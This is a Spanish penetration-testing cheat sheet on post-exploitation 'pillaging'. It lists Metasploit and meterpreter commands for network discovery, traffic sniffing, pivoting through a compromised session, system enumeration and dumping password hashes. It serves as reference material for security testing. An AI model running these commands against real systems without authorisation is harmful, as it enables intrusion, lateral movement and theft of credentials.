Pillaging
Nmap
proxychains nmap -sT -open -n -Pn <CIDR> --top-ports 25
Metasploit
ARP
# Desde sesión de meterpreter
run arp_scanner -r <CIDR>
use post/windows/gather/arp_scanner
set RHOSTS <CIDR>
set SESSION <id-session>
run
Interfaces de red
# Desde sesión de meterpreter
ifconfig
Tabla de enrutamiento
# Desde sesión de meterpreter
route
Servicios de red
Linux/Unix
netstat -antupo
-a = todos los sockets.
-n = hosts, puertos y usuarios en formato numérico.
-t = TCP.
-u = UDP.
-p = PID (Process Identification Number) y nombre del programa.
-o = timer.
Windows
netstat -ano -p <protocolo>
-a = todos los sockets.
-n = hosts y puertos en formato numérico.
-o = PID (Process Identification Number).
-p = TCP, UDP, TCPv6 o UDPv6.
Ping sweep
use post/multi/gather/ping_sweep
set RHOSTS <CIDR>
set SESSION <id-session>
run
Sniffing
# Desde sesión de meterpreter
use sniffer
sniffer_interfaces
sniffer_start <id-interface>
sniffer_dump <id-interface> /<path>/<name.pcap>
sniffer_stop <id-interface>
Escaneo de puertos
# Tabla de enrutamiento
# Incorporación manual
route add <subnet> <netmask> <id-session>
# Desde sesión de meterpreter
run autoroute -s <CIDR>
# Metasploit
use auxiliary/scanner/portscan/tcp
set RHOSTS <CIDR>
set THREADS 10
set PORTS <ports>
run
Aplicaciones
# Windows
use post/windows/gather/enum_applications
set SESSION <id-session>
run
Enumeración automatizada
# Linux/Unix
use post/linux/gather/enum_system
set SESSION <id-session>
run
# Windowsh
# Desde sesión de meterpreter
run winenum
Hashdump
# Linux/Unix
use post/linux/gather/hashdump
set SESSION <id-session>
run
# Windows
# Desde sesión de meterpreter
hashdump
Última actualización
¿Te fue útil?